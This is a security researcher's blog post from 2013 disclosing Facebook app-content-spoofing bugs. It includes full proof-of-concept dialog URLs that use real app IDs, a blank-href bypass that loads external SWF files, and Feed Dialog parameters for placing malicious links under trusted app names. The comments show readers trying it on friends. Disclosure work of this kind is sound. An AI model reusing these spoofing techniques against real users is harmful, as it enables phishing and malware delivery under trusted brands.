16 May 2013
Category: Uncategorized
16 May 2013,
 8

Hi,

For this post, I’ll be talking about how I spoof the content of any app on Facebook. I’m also going to talk about a few of the “unfix”: bug found in Facebook (some of which still work). These bugs provide attackers with avenues to inject external links or images to a wall (newsfeed) post that appear to come from trustworthy apps like Soundcloud or Candy Crush, Most rated Facebook Games / Apps.

But, what exactly does “spoofing app content” entail?

It basically means that an attacker can post content that appears to come from a trusted application onto the wall or newsfeed of a victim.

For example:

You can find content from Saavn, Candy Crush, Spotify, Pinterest, or really any other application on Facebook.

Facebook has a somewhat interesting method of publishing called stream.publish. (http://fbdevwiki.com/wiki/FB.ui#method:_.27stream.publish.27),

This essentially allows you to post on your wall with a Facebook Application for post stream attachments.

The Stream Publish Dialog will look like the following:

https://www.facebook.com/dialog/stream.publish?app_id=xxxx&redirect_uri=http://www.facebook.com/&action_links=&attachment=%7B%27media%27:%20[%7B%27type%27:%20%27flash%27,%27swfsrc%27:%27http://files.nirgoldshlager.com/goldshlager2.swf%27,%27imgsrc%27:%27http://www.vectorstock.com/i/composite/41,30/hacked-pc-vector-194130.jpg%27,%27width%27:%27130%27,%27height%27:%27%20130%27,%27expanded_width%27:%27500%27,%27expanded_%20height%27:%27500%27%7D],%27name%27:%27xxxx%27,%27caption%27:%27xxxx%20Application%27,%27properties%27:%7B%27xxx%27:%7B%27text%27:%27Download%20xxx%27,%27href%27:%27http://nirgoldshlager.com%27%7D%7D%7D

 

This dialog contains a few noteworthy parameters:

1. app_id

2. attachment (swfsr,imgsrc,href)

 

The attacker must first provide the app_id value for the victim application (Saavn, Spotify, etc.).

 

For example:

Saavn’s app_id  is: app_id = 126986924002057

At this point, an attacker must produce attachment parameters like swfrsc and imgsrc.

What occurs if the attacker uses the swfsrc parameter to load swf files that come from an external website (in this case, nirgoldshlager.com)? Will Facebook permit this type of action? It actually seems that Facebook’s default setting is to allow loading external swf files from literally any domain that uses the swfsrc parameter. In reality, there is a feature called Stream post URL security meant to ward off these kinds of attacks. In theory, an app developer using this protection on their Facebook Developer account will not incur attacks of this nature because attackers can’t load external swf files.

 

Stream Post URL Security

 

 

Even so, I discovered a way to get past this protection by eliminating the href parameter (href=).

 

For Example,

 Blocked Request:

 

Blocked Content

 

 

Facebook rightfully blocks my request to validate the original domain (xxx.com) of the owner app (xxx) using the href parameter

(href”:”http:://xxx.com/onlyxxxdotcomdomainallow”),.

To bypass it, I used a blank value in the href parameter:

(href”:””),

For this attack, I utilized the imgrsc and swfsrc parameters to load swf files from an external domain (http://xxx.com).

 

 

 

bypassswf

 

 

PoC Bypass (Fixed By Facebook Security in 2012):

https://www.facebook.com/dialog/stream.publish?access_token=&api_key=211795388914496&app_id=211795388914496&attachment=%7B%22name%22%3A%22NirGoldshlager%22%2C%22caption%22%3A%22%7B*actor*%7D%20Goldshlager%22%2C%22description%22%3A%22%22%2C%22href%22%3A%22%22%2C%22media%22%3A%5B%7B%22type%22%3A%22flash%22%2C%22height%22%3A%22300%22%2C%22imgsrc%22%3A%22http%3A%2F%2Fwww.it-networks.org/wp-content/uploads/2012/01/hacked.jpg%22%2C%22expanded_width%22%3A%22900%22%2C%22expanded_height%22%3A%22400%22%2C%22swfsrc%22%3A%22http://nirgoldshlager.site50.net/goldshlager.swf%23media_id%3Djl95eFLM%26source%3Dsaavn%26title%3DBuddhi%20Do%20Bhagwaan%20%28Charlie%26%2339%3Bs%20Song%29%26album%3DPlayers%26thumb%3Dhttp%3A%2F%2F%26more_link%3Dhttp%3A%2F%2F%2Fp%2Fsong%2Fhindi%2Fplayers%2Fbuddhi%2Bdo%2Bbhagwaan%2FGgRSBBF2e34%26demoStartTime%3D0%26demoDuration%3D30%26url%3D%253D%22%7D%5D%7D&display=popup&locale=en_US&message=&next=https://apps.facebook.com/goldshlagerdemo/&sdk=joey&user_message_prompt=

 

PoC Video (Fixed in  2012):

 

 

 

This bug allowed me to load any amount of swf files from any domain.

Thus, every time a victim visits my wall post, they will see content spoofing from a Facebook application that they generally trust. Clicking the link on the post makes an swf file from the external website execute on his client machine.

In the following video example, I opened a new tab on the victim client that redirects him to my website (nirgoldshlager.com) with the use of an external swf file.

 

 

Bug 2 (The “Unfix” Content Spoofing Bug)

Now let’s go over the unfix content spoofing Facebook app bug.

Facebook eliminated the stream.publish option in 2013, instead opting for a Feed Dialog (https://developers.facebook.com/docs/reference/dialogs/feed/) to publish app activity.

In this Feed Dialog, we’ll use some parameters to perform the content spoofing app bug.

 

 

Feed Dialog

 

 

1.

Link parameter: With this parameter, we will include our malicious external link (virus exe file, 0days, Phishing site, or any other malicious link.

2.

Picture Parameter: This parameter is only usable if we want to spoof the content with an image. The content of the image will only display correctly on our Wall post. It will not display correctly in the newsfeed, making it relevant only to wall post app spoofing.

3.

Caption Parameter: This parameter will allow to an attacker choose from which website the content came from, For Example:

Facebook.com

Zynga.com

Ownerappdomain.com

 

 

soundcloudespoofinal

 

 

4.

Name Parameter: This parameter produces the title we desire. Whenever the victim clicks on that title, he will be taken to our malicious website.

 

PoC Video:

 

 

Solution:

Use  Stream post URL security=Enabled in App settings (developers.facebook.com), To prevent  content spoofing on your App,

 

Use

 

 

 

Bonus Video (Advanced Spoofing Apps Links, Fixed By Facebook Security 2012):

 

 

 

And?

Use  Stream post URL security=Enabled

 

 

 

GAME001-2

 

 

 

 

8 responses on “Spoof Facebook Apps”, Attack / Solution for Owner App

  1. Allan says:

    Sir can u please help me to secure my website..
    Thanks by the way the App Spoofing is very nice i try it!
    my friends loving it :D

  2. Kunal says:

    Awesome ! You are great. You are my hero and my idol !!

  3. dufferzafar says:

    How can i find the appid of other apps?
    I mean, you’ve mentioned some of those but how do get the appid of any app like for example facebook mobile app……

  4. [...] For this post, I’ll be talking about how I spoof the content of any app on Facebook. I’m also going to talk about a few of the “unfix”: bug found in Facebook (some of which still work). These bugs provide attackers with avenues to inject external links or images to a wall (newsfeed) post that appear to come from trustworthy apps like Soundcloud or Candy Crush,  [...]

  5. [...] allow a hacker to spoof the content of any Facebook app easily.   Nir Goldshlager from Break Security today exposed another major flaw that allows hacker to wall post spoofed messages from trusted [...]

  6. [...] allow a hacker to spoof the content of any Facebook app easily.   Nir Goldshlager from Break Security today exposed another major flaw that allows hacker to wall post spoofed messages from trusted [...]

  7. [...] Goldshlager from Break Security today exposed another major flaw that allows hacker to wall post spoofed messages from trusted [...]

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>